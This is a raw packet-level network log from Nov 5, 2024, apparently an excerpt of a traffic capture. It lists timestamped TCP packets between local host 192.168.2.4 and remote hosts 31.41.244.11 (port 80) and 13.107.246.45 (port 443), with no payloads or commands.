Nov 5, 2024 18:46:08.737502098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737505913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737519026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737528086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737539053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737571955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737726927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737804890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.738337040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.738380909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.741801023 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.741839886 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.742049932 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.742082119 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.742101908 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.742115021 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.742120028 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.744841099 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.744864941 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.744930029 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.745083094 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.745094061 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.835369110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835387945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835397005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835402966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835407972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835417032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835433960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835511923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.835556030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835557938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.835601091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.835624933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835637093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835659027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835669041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835793018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.835889101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835937977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.835947990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835958004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.835997105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836030006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836040974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836072922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836163044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836174011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836183071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836195946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836205006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836210966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836220980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836247921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836328983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836371899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836376905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836386919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836425066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836441040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836452961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836462021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836472034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836483955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836493015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836502075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836512089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836513996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836522102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836529016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836555004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836575985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836585999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836596012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836621046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836647034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836674929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836684942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836694956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836704016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836713076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836718082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836723089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836750031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836750984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836760044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836760044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836788893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836859941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836869955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836879969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836889029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836899996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836904049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836910009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836924076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836930037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836940050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.836947918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836981058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836981058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.836988926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837009907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837021112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837033987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837043047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837050915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837060928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837064981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837100029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837140083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837157011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837167025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837188005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837203979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837212086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837222099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837230921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837250948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837272882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837299109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837368011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837378979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837398052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837419033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837424994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837436914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837441921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837451935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837472916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837476969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837487936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837490082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837529898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837529898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837543011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837559938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837570906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837580919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837587118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837593079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837605000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837608099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837618113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837627888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.837631941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837639093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.837663889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.838496923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.838506937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.838516951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.838545084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.838556051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857608080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857618093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857628107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857686996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857712984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857721090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857729912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857737064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857745886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857774019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857779980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857790947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857803106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857834101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.857947111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857955933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857964993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857974052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857985020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857994080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.857997894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858005047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858014107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858020067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858026981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858042955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858061075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858067036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858259916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858269930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858278990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858288050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858298063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858306885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858306885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858318090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858323097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858329058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858339071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858342886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858357906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858381033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858405113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858413935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858422041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858449936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858450890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858465910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858469963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858477116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858483076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858504057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858520985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858572006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858582020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858591080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858599901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858604908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858624935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858659983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858705997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858715057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858724117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858733892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858743906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858764887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858777046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858794928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858795881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858805895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858814955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858825922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858835936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858845949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858850002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858856916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.858872890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.858895063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859045982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859056950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859061956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859066010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859112024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859183073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859190941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859200001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859205008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859214067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859224081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859234095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859240055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859244108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859277010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859277010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859370947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859380960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859390020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859395027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859399080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859404087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859416962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859420061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859433889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859484911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859508038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859518051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859527111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859544039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859551907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859555006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859565020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859566927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859570980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859580994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859596968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859606028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859608889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859626055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859648943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859797955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859808922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859818935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859828949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859838963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859848976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859850883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859857082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859862089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859869957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.859893084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859893084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.859916925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.861772060 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.861959934 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.862042904 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.862076998 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.862087011 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.862102985 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.862108946 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.865601063 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.865645885 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.865740061 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.865861893 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.865874052 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.900435925 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.901628017 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.901642084 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.902060986 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.902065992 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.906203032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.906271935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.906281948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.906347990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.916291952 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.917550087 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.917589903 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.917920113 CET	49812	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.917926073 CET	443	49812	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.957284927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957297087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957309961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957356930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957376003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957386017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957393885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957396030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957406044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957417965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957422018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957441092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957468033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957477093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957479954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957503080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957529068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957689047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957698107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957707882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957716942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957726955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957730055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957762003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957813025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957855940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.957923889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957932949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.957942963 CET	80	49804	31.41.244.11	192.168.2.4
